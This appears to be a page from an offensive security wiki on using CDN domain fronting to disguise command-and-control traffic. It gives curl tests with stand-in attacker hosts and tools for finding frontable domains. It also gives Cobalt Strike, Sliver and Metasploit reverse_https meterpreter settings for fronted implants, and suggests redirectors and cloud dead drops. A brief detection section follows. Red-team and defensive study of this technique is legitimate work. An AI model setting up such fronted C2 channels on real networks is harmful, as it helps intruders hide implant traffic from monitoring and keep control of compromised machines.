CDN - Comain Fronting

Domain fronting uses CDN infrastructure to hide C2 traffic by making requests appear to go to legitimate domains.

How It Works

1. Attacker's C2 and legitimate site share same CDN (e.g., CloudFront)
2. TLS SNI (outer) shows: legitimate-site.com
3. HTTP Host header (inner) shows: attacker-c2.com
4. CDN routes based on Host header, not SNI
5. Network monitoring sees traffic to "legitimate-site.com"

Finding Frontable Domains

Automated Discovery

# FindFrontableDomains
# https://github.com/rvrsh3ll/FindFrontableDomains
python3 FindFrontableDomains.py -d target-cdn.net

# Domain Fronting Tools
# https://github.com/stevecoward/domain-fronting-tools
python3 finder.py --cdn cloudfront

# DomainFrontingLists (pre-compiled lists)
# https://github.com/vysecurity/DomainFrontingLists

Manual Testing

# Test if domain fronting works
# Replace SNI with legitimate domain, Host with your domain

# Using curl
curl -H "Host: your-c2.cloudfront.net" https://legitimate.cloudfront.net/

# If you get response from your-c2 → Domain fronting works

# Test with different CDNs
for domain in $(cat frontable_domains.txt); do
    curl -s -H "Host: your-c2.com" "https://$domain/" | head -1
done

CDN-Specific Techniques

Amazon CloudFront

# Find CloudFront distributions
dig domain.com | grep cloudfront

# Test fronting
curl -H "Host: attacker.cloudfront.net" https://legitimate.cloudfront.net/path

# Note: AWS has restricted domain fronting as of 2018
# But some edge cases may still work

Azure CDN

# Azure Front Door domains
*.azurefd.net
*.azureedge.net

# Test
curl -H "Host: attacker.azurefd.net" https://legitimate.azurefd.net/

Google Cloud CDN

# Google has blocked domain fronting since 2018
# Alternative: Use App Engine with custom domains

Fastly

# Fastly domains
*.fastly.net
*.global.ssl.fastly.net

curl -H "Host: attacker.global.ssl.fastly.net" https://legitimate.global.ssl.fastly.net/

Cloudflare

# Cloudflare domains
*.cloudflare.com

# Note: Cloudflare has mitigations in place
# Workers may be alternative approach

TLS 1.3 Considerations

# TLS 1.3 encrypts more of the handshake
# SNI is still visible unless using ECH (Encrypted Client Hello)

# Noctilucent - TLS 1.3 Domain Fronting
# https://github.com/SixGenInc/Noctilucent
# Exploits TLS 1.3 session resumption

C2 Framework Integration

Cobalt Strike

# Malleable C2 profile for domain fronting
http-get {
    set uri "/search";
    client {
        header "Host" "your-c2.cloudfront.net";
    }
}

# Listener setup:
# Host: legitimate.cloudfront.net
# Host Header: your-c2.cloudfront.net

Sliver

# Generate implant with domain fronting
sliver > https -d legitimate.cloudfront.net -H your-c2.cloudfront.net

# Or in implant config
sliver > generate --http legitimate.cloudfront.net --http-header "Host:your-c2.cloudfront.net"

Metasploit

# Reverse HTTPS with domain fronting
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST your-c2.cloudfront.net
set HttpHostHeader legitimate.cloudfront.net
set OverrideRequestHost true

Detection & Defense

# Indicators to monitor:
1. Mismatch between SNI and Host header
2. Unusual CDN traffic patterns
3. Long-lived HTTPS sessions to CDN edges
4. POST requests to CDN (vs typical GET for static content)

# Defensive measures:
1. Block known CDN IP ranges (drastic)
2. SSL/TLS inspection to compare SNI vs Host
3. Monitor for C2 framework signatures in traffic
4. Analyze CDN logs for suspicious patterns

Alternatives When Fronting Fails

# CDN as redirector
# Set up CDN to proxy to your actual C2

# Serverless redirectors
# Use Lambda@Edge, Cloudflare Workers to redirect

# Legitimate cloud services
# Use Azure Blob, S3 buckets as dead drops

Tools

# Domain Fronting Finder
https://github.com/rvrsh3ll/FindFrontableDomains

# Domain Fronting Tools
https://github.com/stevecoward/domain-fronting-tools

# TLS 1.3 Fronting
https://github.com/SixGenInc/Noctilucent

# Pre-compiled Lists
https://github.com/vysecurity/DomainFrontingLists

C2 Frameworks - C2 framework usage
RT/EDR Evasion - Evasion techniques
SSRF - CDN can be SSRF target

PreviousServerless Security NextCloud AI Security

Last updated 8 days ago

Was this helpful?

hashtagHow It Works

hashtagFinding Frontable Domains

hashtagAutomated Discovery

hashtagManual Testing

hashtagCDN-Specific Techniques

hashtagAmazon CloudFront

hashtagAzure CDN

hashtagGoogle Cloud CDN

hashtagFastly

hashtagCloudflare

hashtagTLS 1.3 Considerations

hashtagC2 Framework Integration

hashtagCobalt Strike

hashtagSliver

hashtagMetasploit

hashtagDetection & Defense

hashtagAlternatives When Fronting Fails

hashtagTools

hashtagRelated Topics

How It Works

Finding Frontable Domains

Automated Discovery

Manual Testing

CDN-Specific Techniques

Amazon CloudFront

Azure CDN

Google Cloud CDN

Fastly

Cloudflare

TLS 1.3 Considerations

C2 Framework Integration

Cobalt Strike

Sliver

Metasploit

Detection & Defense

Alternatives When Fronting Fails

Tools

Related Topics